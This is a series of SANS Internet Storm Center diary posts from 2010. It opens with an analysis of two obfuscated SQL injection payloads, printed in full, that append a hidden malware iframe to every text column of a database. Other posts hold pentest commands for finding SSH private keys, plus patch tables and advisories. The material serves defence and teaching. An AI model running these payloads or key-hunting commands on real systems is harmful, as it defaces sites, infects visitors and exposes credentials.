Reader Alan reported a series of log records that look like SQL injection but are obfuscated. The following two records were reported:
declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e616d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e696420614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e78545950653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d205461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343734373037303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324537303638373033463733363934433331323232303737363936343734363833443232333032323230363836353639363736383734334432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324636393636373236313644363533452061532076615243486172283130362929272920464554436820 4e6578742066526f6d207441426c655f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c655f435552736f7220%20as%20varchar(4000));exec(@s);--
declare%20@s%20varchar(4000);set%20@s=cast(0x6465636c617245204054205661726368417228323535292c406320566172436861522832353529206465436c615265207441624c455f637552736f7220437552536f7220664f522073454c45435420412e4e616d452c622e4e616d652066726f4d207379734f626a6563547320612c735973634f6c754d6e73206220576865524520612e69643d422e496420416e4420612e78545970453d27552720414e642028622e58745950653d3939204f5220622e58747950653d3335204f5220622e78747950453d323331206f7220422e58747950453d31363729206f70454e207441426c455f437552734f72206665746348206e4578742046724f6d205441426c655f637572736f7220494e546f2040742c4043205748694c6528404066655463485f7374615475733d302920624547694e20455845632827557064615465205b272b40742b275d20536574205b272b40632b275d3d727472494d28434f6e7665525428764172434841722834303030292c5b272b40432b275d29292b63615374283078334336393636373236313644363532303733373236333344323236383734373437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324537303638373033463733363934433331323232303737363936343734363833443232333032323230363836353639363736383734334432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324636393636373236313644363533452041732056417263486152283130362929272920464554634820 6e4578542046524f4d205441626c655f437572734f5220494e546f2040742c406320654e6420436c4f5365205461624c455f635552734f52206445416c6c6f43415445205461426c455f435552736f5220%20as%20varchar(4000));exec(@s);--
In both cases we see the use of the CAST command. What is its purpose? To convert information from one data type to another. Since the data inside the CAST is hexadecimal and a conversion to varchar is requested, we can do the conversion manually with an ASCII table. Let's use the table at http://www.asciitable.com to perform it. Keep in mind that two hexadecimal digits correspond to one byte. The conversion of the first seven bytes is as follows:
ATTACK # 1                | ATTACK # 2
Byte | ASCII Equivalent   | Byte | ASCII Equivalent
64   | d                  | 64   | d
45   | E                  | 65   | e
63   | c                  | 63   | c
4C   | L                  | 6C   | l
41   | A                  | 61   | a
72   | r                  | 72   | r
45   | E                  | 45   | E
There are automated tools to perform this task. I use Ascii Hex URL Decoder. If you prefer web tools, you can use http://nickciske.com/tools/hex.php.
After decoding attack #1, we obtain the following SQL sentence:
dEcLArE @T vaRchaR(255),@c vARCHAr(255) decLAre tabLE_cUrsOR CURSOR FoR SELECt A.name,b.naMe froM sysObjeCts a,sysCOLuMNs b wheRE a.id=B.id aND A.XtYPe='U' and (b.xTYPe=99 or b.XType=35 oR B.xTYPe=231 OR b.xtypE=167) oPEN TAbLe_cuRsor fETCH neXT FROm TaBlE_CuRsOr INtO @T,@c whilE(@@FetCh_stAtuS=0) beGIn exEc('UpDaTE ['+@t+'] SeT ['+@c+']=rtRIM(CONVeRT(VARCHAr(4000),['+@C+']))+caST(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E aS vaRCHar(106))') FETCh Next fRom tABle_cUrsOr IntO @t,@c EnD Close tablE_CuRsoR dEALLoCATe TaBLe_CURsor
We now realize there is a second CAST command present in the SQL sentence. Further decoding shows the following URL (http modified to hxxp to avoid clicking):
iframe src=hxxp://nemohuildiin.ru/tds/go.php?sid=1 width=0 height=0 style=display:none/iframe
This attack will try to update every varchar column in your database to append the iframe text shown. This has been a massive and successful attack. If you search Google for the iframe, you can see many affected sites.
The IFRAME seems to be deactivated because it does not download any information (0 bytes). See the Length: 0 in the output below:
$ wget hxxp://nemohuildiin.ru/tds/go.php?sid=1
--2010-08-15 15:20:49-- hxxp://nemohuildiin.ru/tds/go.php?sid=1
Resolving nemohuildiin.ru... 59.53.91.195
Connecting to nemohuildiin.ru|59.53.91.195|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: hxxp://vamptoes.ru:8080/index.php?pid=13 [following]
--2010-08-15 15:20:51-- hxxp://vamptoes.ru:8080/index.php?pid=13
Resolving vamptoes.ru... 91.121.122.81, 178.32.5.233, 178.208.81.34, ...
Connecting to vamptoes.ru|91.121.122.81|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 0 [text/html]
Saving to: `index.php@pid=13.1'
[ = ] 0 --.-K/s in 0s
2010-08-15 15:20:52 (0.00 B/s) - `index.php@pid=13.1' saved [0/0]
Let us now see the SQL sentence from attack #2:
declarE @T VarchAr(255),@c VarChaR(255) deClaRe tAbLE_cuRsor CuRSor fOR sELECT A.NamE,b.Name froM sysObjecTs a,sYscOluMns b WheRE a.id=B.Id AnD a.xTYpE='U' ANd (b.XtYPe=99 OR b.XtyPe=35 OR b.xtyPE=231 or B.XtyPE=167) opEN tABlE_CuRsOr fetcH nExt FrOm TABle_cursor INTo @t,@C WHiLe(@@feTcH_staTus=0) bEGiN EXEc('UpdaTe ['+@t+'] Set ['+@c+']=rtrIM(COnveRT(vArCHAr(4000),['+@C+']))+caSt(0x3C696672616D65207372633D22687474703A2F2F6E656D6F6875696C6469696E2E72752F7464732F676F2E7068703F7369643D31222077696474683D223022206865696768743D223022207374796C653D22646973706C61793A6E6F6E65223E3C2F696672616D653E As VArcHaR(106))') FETcH nExT FROM TAble_CursOR INTo @t,@c eNd ClOSe TabLE_cURsOR dEAlloCATE TaBlE_CURsoR
Again, there is a second CAST command inside the SQL sentence. Further decoding shows the following:
iframe src=hxxp://nemohuildiin.ru/tds/go.php?sid=1 width=0 height=0 style=display:none/iframe
SQL injection is bad and something people need to avoid by developing web applications safely. Here are some tips:
Sanitize input data: input entered by the user should not contain any SQL sentences or commands at all. Check for good data by validating type, length, format, and range.
Use stored procedures: your web application should have predetermined SQL sentences for data access. If the user requests some specific information, the application invokes the specific stored procedure, so there is no possibility of crafting a dynamic SQL request.
Use an account with restricted permissions in the database: grant execute permission only on selected stored procedures and provide no direct table access.
Avoid disclosing database error information: make sure you do not disclose detailed error messages to the user, because detailed error information shows the attacker where to look when an attack attempt fails.
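The first two tips, input validation and keeping user data out of the statement text, can be shown side by side in a few lines. The following Python is an added example for this diary, not code from the original post: it uses the standard-library sqlite3 module with a constructed in-memory table in place of the MS SQL Server the attack targets. Because sqlite3's execute() refuses stacked statements, the classic tautology payload is used to show why concatenation fails and a bound parameter does not; the stored-procedure and restricted-account tips are server-side configuration and are not shown here.

```python
import re
import sqlite3


def build_db():
    """Constructed sample data: an in-memory table standing in for an application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (name, role) VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_vulnerable(conn, name):
    """Dynamic SQL built by string concatenation: the user's input becomes part of the statement."""
    sql = "SELECT name, role FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Same query with a bound parameter: the driver passes the value as data, never as SQL text."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


# Allow-list for the field: type, length and format, per the diary's first tip.
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def validate_name(name):
    """True only for a string of 1..32 characters drawn from the allowed set."""
    return isinstance(name, str) and bool(NAME_RE.match(name))


def lookup_hardened(conn, name):
    """Validation first, then a parameterized query; bad input is rejected, not sanitized in place."""
    if not validate_name(name):
        raise ValueError("rejected input for 'name'")
    return lookup_parameterized(conn, name)


if __name__ == "__main__":
    db = build_db()
    evil = "alice' OR '1'='1"          # constructed tautology payload
    print("vulnerable:    ", lookup_vulnerable(db, evil))      # every row comes back
    print("parameterized: ", lookup_parameterized(db, evil))   # no row has that literal name
    try:
        lookup_hardened(db, evil)
    except ValueError as exc:
        print("hardened:      ", exc)
```

Note that the hardened path rejects rather than "cleans" the input: stripping quotes from a string still leaves whatever else the attacker sent, whereas a parameterized query needs no cleaning at all.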
-- Manuel Humberto Santander Peláez | http://twitter.com/manuelsantander | http://manuel.santander.name | msantand at isc dot sans dot org
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
I certainly agree that the number of vulnerabilities is increasing and that you have to be able to write tools yourself to cover the required aspects of auditing web applications, because current frameworks and vulnerability scanners don't cover all critical possibilities.
There was an excellent talk at Black Hat about Python as a tool for developing web application security testing tools. Find the video here: http://securitytube.net/Offensive-Python-for-Web-Hackers-%28Blackhat%29-video.aspx
-- Manuel Humberto Santander Peláez | http://twitter.com/manuelsantander | http://manuel.santander.name | msantand at isc dot sans dot org
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
Oracle is cancelling the OpenSolaris project and focusing on Solaris 11. See below:
All of Oracle's efforts on binary distributions of Solaris technology will be focused on Solaris 11. We will not release any other binary distributions, such as nightly or bi-weekly builds of Solaris binaries, or an OpenSolaris 2010.05 or later distribution. We will determine a simple, cost-effective means of getting enterprise users of prior OpenSolaris binary releases to migrate to S11 Express.
More information at http://mail.opensolaris.org/pipermail/opensolaris-discuss/2010-August/059310.html
-- Manuel Humberto Santander Peláez | http://twitter.com/manuelsantander | http://manuel.santander.name | msantand at isc dot sans dot org
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
Information security, specifically the encryption technology used in BlackBerry, is under fire from the Indian government. The Canadian company Research in Motion (RIM), manufacturer of BlackBerry smartphones, has faced challenges from a few foreign governments regarding the monitoring of BlackBerry data. A number of countries, in particular India, are applying a tremendous amount of pressure on RIM to release technology that would allow their government agencies to decrypt BlackBerry data, a valid concern in this day and age. Citizens of some countries in the world today enjoy the right to freedom of expression; however, this is not so everywhere. India, specifically, has a law that permits its government to intercept any computer communication without a court order. Additionally, RIM is a private company operating within the borders of a foreign country, one that holds a large market share in the telecommunications arena. In this case, India as a sovereign government has every right to define its laws and boundaries. RIM has the right to act in the best interest of its company and shareholders. The BlackBerry enterprise solution for one customer is the same for all.
The questions I'm looking for your comments on today, reader, are these: if a deal is struck where the ability to monitor communications is given to another government or organization, what will the repercussions be? And what impact would this have on you, personally and professionally, in meeting your mobile technology demands? For example, BlackBerry is the device of choice for the US Army. Would the US government make the same decision next time?
I welcome your thoughts,
tony d0t Carothers _@_ gmail.com
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
The Shadowserver Foundation has made available a new, free public service to test the MD5 or SHA1 hashes of binaries and see whether they belong to a known set of software. The initial service is based on the lists from NIST, but over time they plan to add other sources. The service is offered via HTTP and responses are returned as a JSON object.
The service can be accessed here.
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
Cisco IOS 15.1(2)T is affected by a denial of service (DoS) vulnerability during the TCP establishment phase. Cisco indicated that no authentication is required to exploit this vulnerability. The advisory and a list of workarounds are posted here.
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org
SEC 558: Coming to Toronto, ON in Nov 2010
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
QuickTime 7.6.7 is now available and addresses CVE-2010-1799. The update is available for Windows 7, Vista, and XP SP2 or later. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. The update can be downloaded here.
-----------
Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org
Comprehensive Packet Analysis in French, Québec, 5 Nov 2010
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
We have received some reports about a new SSH brute force script, possibly named dd_ssh, that gets dropped onto web servers, most likely via an older phpMyAdmin vulnerability. If you have sample log entries from a successful attack or can share a copy of dd_ssh, please let us know. The current DShield figures do show a recent uptick in the number of sources participating in SSH scanning.
Update 1735 UTC: We have received several samples of dd_ssh, with MD5 24dac6bab595cd9c3718ea16a3804009. If your MD5 differs, please still send us a copy. It also looks like the vulnerability exploited is indeed in phpMyAdmin, but it seems to be the rather old CVE-2009-1151. Again, if your information differs, please let us know. Thanks to all the ISC readers who responded so far!
Update 2005 UTC: Several readers have identified 91-193-157-206 as the most likely original source of the scanning for phpMyAdmin's setup.exe. If successful, two files named vmsplice.txt and dd.txt were downloaded from that same IP. How exactly dd_ssh was installed is not yet clear, but most readers found it in /tmp after a POST request to phpmyadmin/scripts/setup.exe. A running dd_ssh was seen talking to a bunch of IPs over ports 54509 and 54510; this is most likely the C&C connection.
Update 2020 UTC: We have reasonably established that the vulnerability exploited to drop the SSH scanner was indeed CVE-2009-1151. C'mon, folks, if you insist on having your phpMyAdmin reachable from the Internet (why would you? Access control isn't hard!) then please at least upgrade to the most current version, which at this time is 2.11.10 or 3.3.5.
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
Overview of the Aug 2010 Microsoft patches and their status.
Update: Microsoft also released an advisory for an unpatched privilege escalation vulnerability.
Update 2: Exploit code apparently exists for MS10-048, but it is not being seen in the wild at present.
# | Affected | Contra Indications | Known Exploits | Microsoft rating | ISC rating(*) clients | ISC rating(*) servers
MS10-047 | Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (Replaces MS10-021). Windows Kernel. CVE-2010-1888, CVE-2010-1889, CVE-2010-1890 | KB 981852 | no known exploits | Severity: Important; Exploitability: 1,2,? | Important | Important
MS10-048 | Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (Replaces MS10-032). Windows Kernel. CVE-2010-1887, CVE-2010-1894, CVE-2010-1895, CVE-2010-1896, CVE-2010-1897 | KB 2160329 | PoC code apparently exists | Severity: Important; Exploitability: ?,1,1,1,1 | Important | Important
MS10-049 | Vulnerabilities in SChannel Could Allow Remote Code Execution. IIS and SChannel. CVE-2009-3555, CVE-2010-2566 | KB 980436 | no known exploits | Severity: Critical; Exploitability: 3,2 | Important | Critical
MS10-050 | Vulnerability in Windows Movie Maker Could Allow Remote Code Execution (Replaces MS10-016). Windows Movie Maker. CVE-2010-2564 | KB 981997 | no known exploits | Severity: Important; Exploitability: 1 | Critical | Important
MS10-051 | Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (Replaces MS08-069). Microsoft XML Core Services. CVE-2010-2561 | KB 2079403 | no known exploits | Severity: Critical; Exploitability: 2 | Critical | Critical
MS10-052 | Vulnerability in Microsoft MPEG Layer-3 Codecs Could Allow Remote Code Execution. Microsoft MPEG Layer-3 Codecs. CVE-2010-1882 | KB 2115168 | no known exploits | Severity: Critical; Exploitability: 1 | Critical | Important
MS10-053 | Cumulative Security Update for Internet Explorer (Replaces MS10-035). Internet Explorer. CVE-2010-1258, CVE-2010-2556, CVE-2010-2557, CVE-2010-2558, CVE-2010-2559, CVE-2010-2560 | KB 2183461 | no known exploits | Severity: Critical; Exploitability: 3,2,1,2,2,1 | Critical | Important
MS10-054 | Vulnerabilities in SMB Server Could Allow Remote Code Execution. SMB server. CVE-2010-2550, CVE-2010-2551, CVE-2010-2552 | KB 982214 | no known exploits | Severity: Critical; Exploitability: 2,3,3 | Critical | Critical
MS10-055 | Vulnerability in Cinepak Codec Could Allow Remote Code Execution. Cinepak codec. CVE-2010-2553 | KB 982665 | no known exploits | Severity: Critical; Exploitability: 1 | Critical | Important
MS10-056 | Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (Replaces MS09-068, MS09-027, MS10-036). Word. CVE-2010-1900, CVE-2010-1901, CVE-2010-1902, CVE-2010-1903 | KB 2269707 | no known exploits | Severity: Critical; Exploitability: 1,1,2,2 | Critical | Important
MS10-057 | Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution (Replaces MS10-036, MS10-038). Excel. CVE-2010-2562 | KB 2269707 | no known exploits | Severity: Important; Exploitability: 1 | Critical | Important
MS10-058 | Vulnerabilities in TCP/IP Could Allow Elevation of Privilege. Windows Networking (TCP/IP). CVE-2010-1892, CVE-2010-1893 | KB 978886 | no known exploits | Severity: Important; Exploitability: 3,1 | Important | Important
MS10-059 | Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege. Tracing Facility for Services. CVE-2010-2554, CVE-2010-2555 | KB 982799 | no known exploits | Severity: Important; Exploitability: ?,1 | Important | Important
MS10-060 | Vulnerabilities in the Microsoft .NET Common Language Runtime and in Microsoft Silverlight Could Allow Remote Code Execution (Replaces MS09-061). .NET and Silverlight. CVE-2010-0019, CVE-2010-1898 | KB 2265906 | no known exploits | Severity: Critical; Exploitability: 1,1 | Critical | Critical
We will update issues on this page for about a week or so as they evolve.
We appreciate updates.
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
We use 4 levels:
PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments are vulnerable and exploits are being used or are easy to obtain or make.
Critical: Anything that needs little to become interesting for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
Important: Things where more testing and other measures can help.
Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers, such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.
The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
All patches released by a vendor are important enough to have a close look at if you use the affected systems. There is little incentive for vendors to publicize patches that do not address some form of risk.
---------------
Jim Clausing, jclausing --at-- isc [dot] sans (dot) org
FOR408 coming to central OH in Sep, see http://www.sans.org/mentor/details.php?nid=22353
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
In view of all the brute force attacks still being attempted against Secure Shell (SSH), we have long since been extolling the virtues of forgoing passwords and moving to RSA/DSA keys instead.
While key based login indeed nicely addresses the problem of password guessing attacks, it looks like many a Unix admin has been less than diligent in the implementation. In pretty much every Unix security audit recently, we've come across unprotected or badly protected SSH private keys (id_dsa, id_rsa). Some reside plain flat out in the open, in /tmp and such. Others are found in world-readable tar backup archives of user and administrator home directories. Some are even built into home-grown Linux RPM and Solaris PKG packages, ready to be plucked off an install server.
It probably goes without saying, but let's repeat it nonetheless:
Whoever can access a TAR/ZIP/GZ archive can read all its contents. Be super careful when you create a temporary archive copy of everything residing in a home directory. This copy is bound to include the .ssh directory, and the private keys therein.
Whoever can access an RPM or PKG package can read all its contents. Yes, it is convenient to have the SSH keys that are part of your home-grown admin script suite already within the install package. But then don't be surprised if others make use of this convenience, too.
In a Unix penetration test within a company or academic institution network, we often first go looking for files and directories that can be read without authentication. Most large organizations have an install server from which they stage their new Unix systems, and often we find these install servers openly sharing the package filesystem over NFS for everyone. Other good choices are home directories, all too often also exported via NFS to everyone. Once read access is established, we can go hunting:
$ find /mnt/some_exported_fs \( -name id_dsa -o -name id_rsa \)
$ find /mnt/some_exported_fs -type d -name .ssh
$ find /mnt/some_exported_fs -type f -name "*.tar" -exec tar tvf {} \; | egrep "(^/|id_dsa|id_rsa|\.ssh)"
...etc. Adapt as needed for your environment.
To better protect your privates, please consider the following:
Add a passphrase to all private keys that are used interactively. ssh-keygen -p can be used to add a passphrase to an existing private key.
Use a forced command for all private keys that are used in system automation, to limit the abuse potential. Use command="/bin/foo/bar" in an authorized_keys file to limit what the corresponding private key can do.
Keys without a passphrase look different from those that have one. If you want to make sure that your users also protect their privates, you can (as root) search for keys without a passphrase with the following command:
# find / \( -name id_dsa -o -name id_rsa \) -exec egrep -L Proc-Type {} \; 2>/dev/null
Newer DSA/RSA keys contain the string Proc-Type in the key file when a passphrase is set on the key. The above command lists all key files where this isn't the case (egrep -L).
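The Proc-Type check above works for keys in the traditional PEM format that ssh-keygen wrote at the time. Keys in the newer "openssh-key-v1" container (the -----BEGIN OPENSSH PRIVATE KEY----- files that ssh-keygen writes today) never carry a Proc-Type header; whether they are encrypted is recorded as the cipher name inside the base64 body, and an unprotected key has the cipher "none". The following Python is an added example written for this diary, not code from the original post: it walks a tree, recognises private keys by content rather than by the id_dsa/id_rsa file names (keys in archives' extraction directories or admin script suites are often named differently), classifies each as passphrase-protected or not for traditional PEM, PKCS#8 and openssh-key-v1 files, and flags world-readable ones. The sample files it scans are constructed in a temporary directory; the openssh-key-v1 fixtures carry only the header fields, not a loadable key.

```python
import base64
import os
import shutil
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _classify_openssh_v1(pem):
    """openssh-key-v1: magic, then uint32-length-prefixed ciphername; 'none' means no passphrase."""
    lines = pem.split(b"\n")[1:]
    body = b"".join(l.strip() for l in lines if l.strip() and not l.startswith(b"-----"))
    try:
        raw = base64.b64decode(body, validate=True)
    except ValueError:
        return None
    if not raw.startswith(OPENSSH_MAGIC) or len(raw) < len(OPENSSH_MAGIC) + 4:
        return None
    off = len(OPENSSH_MAGIC)
    (clen,) = struct.unpack(">I", raw[off:off + 4])
    cipher = raw[off + 4:off + 4 + clen]
    return "unencrypted" if cipher == b"none" else "encrypted"


def classify_private_key(data):
    """Return 'encrypted', 'unencrypted', or None when the bytes are not a private key we recognise."""
    head = data.lstrip()
    if not head.startswith(b"-----BEGIN "):
        return None
    first_line = head.split(b"\n", 1)[0].strip()
    if first_line == b"-----BEGIN OPENSSH PRIVATE KEY-----":
        return _classify_openssh_v1(head)
    if first_line == b"-----BEGIN ENCRYPTED PRIVATE KEY-----":   # PKCS#8, always encrypted
        return "encrypted"
    if first_line == b"-----BEGIN PRIVATE KEY-----":             # PKCS#8, never encrypted
        return "unencrypted"
    if first_line.endswith(b" PRIVATE KEY-----"):                # traditional RSA/DSA/EC PEM
        return "encrypted" if b"Proc-Type: 4,ENCRYPTED" in head else "unencrypted"
    return None


def scan_tree(root, max_size=65536):
    """Walk `root`; return (path, status, world_readable) for every file that is a private key."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode) or st.st_size > max_size:
                    continue
                with open(path, "rb") as fh:
                    status = classify_private_key(fh.read())
            except OSError:
                continue
            if status:
                findings.append((path, status, bool(st.st_mode & stat.S_IROTH)))
    return findings


def make_openssh_header(cipher, kdf=b"none"):
    """Constructed fixture: only the header fields of openssh-key-v1, not a loadable key."""
    raw = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher + struct.pack(">I", len(kdf)) + kdf
    return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(raw)
            + b"\n-----END OPENSSH PRIVATE KEY-----\n")


# Constructed traditional-PEM fixtures (bodies are placeholders, not real key material).
PEM_PLAIN = b"-----BEGIN RSA PRIVATE KEY-----\nMIIEcONSTRUCTEDbody\n-----END RSA PRIVATE KEY-----\n"
PEM_ENC = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
           b"DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
           b"MIIEcONSTRUCTEDbody\n-----END RSA PRIVATE KEY-----\n")


def demo_scan():
    """Build a constructed home directory in a temp dir, scan it, return (relpath, status, world_readable)."""
    root = tempfile.mkdtemp()
    try:
        samples = {
            ".ssh/id_rsa": PEM_PLAIN,                                    # unprotected, classic name
            ".ssh/id_ed25519": make_openssh_header(b"aes256-ctr", b"bcrypt"),  # protected, new format
            "scripts/deploy_key": make_openssh_header(b"none"),          # unprotected, odd name
            "backup/old_id_dsa": PEM_ENC,                                # protected, classic PEM
            "notes/readme.txt": b"not a key",
        }
        for rel, data in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        return sorted((os.path.relpath(p, root), s, w) for p, s, w in scan_tree(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for rel, status, world in demo_scan():
        print("%-22s %-12s %s" % (rel, status, "WORLD-READABLE" if world else ""))
```

Run it as root over exported filesystems or install-server trees instead of the temp directory; every "unencrypted" hit is a key that anyone with read access can use as-is.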
If you got additional tips on how to protect SSH private keys on Unix, or how to best locate misplaced / unprotected private keys, please let us know.
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
This is a busy day for the folks doing patching out there. Aside from the MS patches released today, Adobe also released a bunch of security updates.
Here are the links to each of the security updates:
Flash Media Server - Rating: Critical (rated by Adobe)
Adobe AIR and Flash - Rating: Critical (rated by Adobe)
ColdFusion - Rating: Important (rated by Adobe)
With the current exploitation trend, the Flash vulnerability should be a high priority for patching. Happy patching.
--------------------
Jason Lam
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
Tom wrote in to the handlers list today and asked a question that I think our readers can help with (especially since we've gotten so many great ideas from the diary asking for suggestions for Cyber Security Month). He is looking for tools to allow more proactive monitoring of his systems, but given shrinking budgets (he works in government, but the situation isn't much better anywhere else), he's looking for something free or, at least, inexpensive. What are you using to monitor patch status? Application versions? A/V? Behavior? Strange files? Network devices? Anything else? Is it centrally managed? Does it scale?
---------------
Jim Clausing, jclausing --at-- isc [dot] sans (dot) org
FOR408 Computer Forensics Essentials coming to central OH in Sept, see http://www.sans.org/mentor/details.php?nid=22353
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
As most of our readers know, the past three years we participated in Cyber Security Awareness Month by covering a special topic each day. We are less than two months away from this year's awareness campaign and we are looking for your ideas on what we should focus on this year. Here are links to summaries of the past three years so that you can see what we've done:
2007: http://isc.sans.edu/diary.html?storyid=3597
2008: http://isc.sans.edu/diary.html?storyid=5279
2009: http://isc.sans.edu/diary.html?storyid=7504
The handlers were discussing this topic a couple of weeks ago and came up with some ideas. Here is what we've been noodling as possible topics for 2010:
- Key services that should or should not be running, and how to secure those services that are necessary
- How to secure popular applications in categories like social (Facebook, etc.), desktop (MS Office, etc.), mobile (iPhone apps, etc.), web apps (online banking, etc.) and cloud (Google Docs, etc.)
- How to use security tools like Nessus or Wireshark
- Manipulating Windows registry settings
- Security horror stories
We'd really like to do something that has a lot of meaning for our readership. So use the comment link below to add your ideas and thoughts, or if you want to share your thoughts privately with us use our contact form. In the past, we've had a general theme for the entire month then discussed sub-themes each week. If you look back at the previous years you can see how that theme is carried out.
Marcus H. Sachs
Director, SANS Internet Storm Center
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
Two of our readers (thanks Jason and Mike!) have written in to highlight the ongoing DDoS against DNS Made Easy.
You can read the ongoing reports via their Twitter page. The DDoS is reported to be circa 50 Gb/sec in size. If you have any details on the type of attack, we'd love to know.
Steve Hall
ISC Handler
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
Seb dropped me a note today to ask to remind our readers that we are on countdown to a bumper crop of patches being released by Microsoft on Tuesday.
On Microsoft's Advanced Notification website they report 14 bulletins, with 8 critical and 6 important. Given that all the criticals are classified as remote code execution, it's time to dust off your monthly patching process and get it shipshape, ready for the fun to start.
Given that we have a few days between Seb's timely reminder and when we need to push the patch button, how good do you think your patching processes are? How do you measure their effectiveness? How do you measure their maturity?
Maybe you could consider scoring them against a scale such as COBIT. There is a nice table on the ISACA site which explains the ratings within COBIT (taken from the SEI Capability Maturity Model (CMM)), which I've taken and reproduced below:
Level 0: Non-existent
Level 1: Initial/ad hoc
Level 2: Repeatable but Intuitive
Level 3: Defined Process
Level 4: Managed and Measurable
Level 5: Optimized
Given the frequency with which suppliers, including Microsoft, release such patches, where would you score yourself?
If you score somewhere between 3 and 4, in that you have a process but you don't measure your success, what would you do to get up towards a 4, or maybe even a 5?
Let me know before you get busy patching those systems, and I'll update with the best suggestions.
Steve Hall
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
www.foxitsoftware.com/announcements/2010861227.html
===============
Rob VandenBrink Metafore
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
It seems that every time I do a security assessment or pentest, the findings include problems with access controls for things like routers, switches, fiber channel switches, bladecenters and the like. And when I say every time, I really mean EVERY TIME. So, what kind of problems are common, and what can you do to prevent them?
Default Credentials
